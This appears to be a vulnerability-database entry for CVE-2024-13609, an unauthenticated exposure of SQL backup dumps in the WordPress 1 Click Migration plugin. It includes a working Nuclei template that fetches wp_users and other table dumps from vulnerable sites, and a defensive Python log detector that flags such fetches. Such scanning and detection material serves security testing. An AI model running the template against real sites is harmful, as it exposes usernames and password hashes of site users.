
WordPress 1 Click Migration Plugin < 2.3 - Information Exposure

CVE-2024-13609
Verified

Description

The 1 Click WordPress Migration Plugin – 100% FREE for a limited time plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2 via class-ocm-backup.php. This makes it possible for unauthenticated attackers to extract sensitive data, including usernames and their password hashes, during the short window in which a backup is in progress.

Severity

Medium

CVSS Score

5.9

Exploit Probability

18%

Affected Product

1-click-migration

Published Date

February 7, 2026

Template Author

pussycat0x

CVE-2024-13609.yaml
id: CVE-2024-13609
info:
  name: WordPress 1 Click Migration Plugin < 2.3 - Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    The 1 Click WordPress Migration Plugin – 100% FREE for a limited time plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2 via the class-ocm-backup.php. This makes it possible for unauthenticated attackers to extract sensitive data including usernames and their respective password hashes during a short window of time in which the backup is in process.
  impact:
    Unauthenticated attackers can retrieve sensitive data including usernames and password hashes, risking account compromise.
  remediation:
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/17fa121a-caa6-46ef-a865-eafd97d86abb/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13609
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cwe-id: CWE-200
    cve-id: CVE-2024-13609
    epss-score: 0.17698
    epss-percentile: 0.9528
  metadata:
    verified: true
    max-request: 6
    framework: wordpress
    vendor: 1-click-migration
    product: 1-click-migration
    fofa-query: body="/wp-content/plugins/1-click-migration/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,1clickmigration,exposure,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/tmp/db/{{table}}.sql"

    attack: batteringram
    payloads:
      table:
        - "wp_users"
        - "wp_usermeta"
        - "wp_options"
        - "wp_posts"
        - "wp_comments"
        - "wp_postmeta"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "CREATE TABLE", "INSERT INTO", "DROP TABLE")'
          - 'contains(content_type, "application/sql")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100fef1266bb4a9c51b87f94300112d01daa37574c72c3ed352ebcd221dc63e4d26022100eb870b5789f05243e90121a1561917d23ded0202ddfb90efca75d7e57bcff673:922c64590222798bb761d5b6d8e72950
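The template above probes for per-table SQL dumps served from /wp-content/tmp/db/. As an added example (not part of the Nuclei template or the plugin), the Python below is a defender-side detector that parses web-server access logs in combined format and flags successful fetches of those dumps, weighting wp_users and wp_usermeta highest because they hold usernames and password hashes. The log lines are constructed samples, not real traffic.

```python
import re
from dataclasses import dataclass

# Constructed sample of combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [07/Feb/2026:10:01:12 +0000] "GET /wp-content/tmp/db/wp_users.sql HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Feb/2026:10:01:13 +0000] "GET /wp-content/tmp/db/wp_options.sql HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Feb/2026:10:02:40 +0000] "GET /wp-admin/admin.php?page=1-click-migration HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
203.0.113.5 - - [07/Feb/2026:10:03:01 +0000] "GET /wp-content/tmp/db/wp_usermeta.sql HTTP/1.1" 200 77001 "-" "curl/8.5.0"
"""
# Combined log format: ip ident user [timestamp] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Same path shape the Nuclei template requests: a table dump under the plugin's temp dir.
DUMP_RE = re.compile(r"^/wp-content/tmp/db/(?P<table>[A-Za-z0-9_]+)\.sql$")
# Tables whose exposure is most damaging (usernames and password hashes).
HIGH_VALUE = {"wp_users", "wp_usermeta"}

@dataclass
class Hit:
    ip: str
    timestamp: str
    table: str
    size: int
    high_value: bool

def find_dump_access(log_text: str) -> list[Hit]:
    """Return HTTP 200 fetches of .sql dumps from the temp backup directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable combined-format line
        d = DUMP_RE.match(m["path"].split("?", 1)[0])
        if not d or int(m["status"]) != 200:
            continue  # other paths, or 403/404: the dump was not served
        size = 0 if m["size"] == "-" else int(m["size"])
        hits.append(Hit(m["ip"], m["ts"], d["table"], size, d["table"] in HIGH_VALUE))
    return hits

if __name__ == "__main__":
    for h in find_dump_access(SAMPLE_LOG):
        level = "HIGH" if h.high_value else "info"
        print(f"[{level}] {h.ip} fetched {h.table}.sql ({h.size} bytes) at {h.timestamp}")
```

A hit on wp_users.sql or wp_usermeta.sql should be treated as a credential exposure and followed by a forced password reset, since the hashes are offline-crackable.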
CVSS Metrics

Score:
5.9
CVSS Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2024-13609
CWE ID:
CWE-200

References

https://wpscan.com/vulnerability/17fa121a-caa6-46ef-a865-eafd97d86abb/
https://nvd.nist.gov/vuln/detail/CVE-2024-13609

Remediation Steps

Update to the latest version of the plugin where the issue is fixed.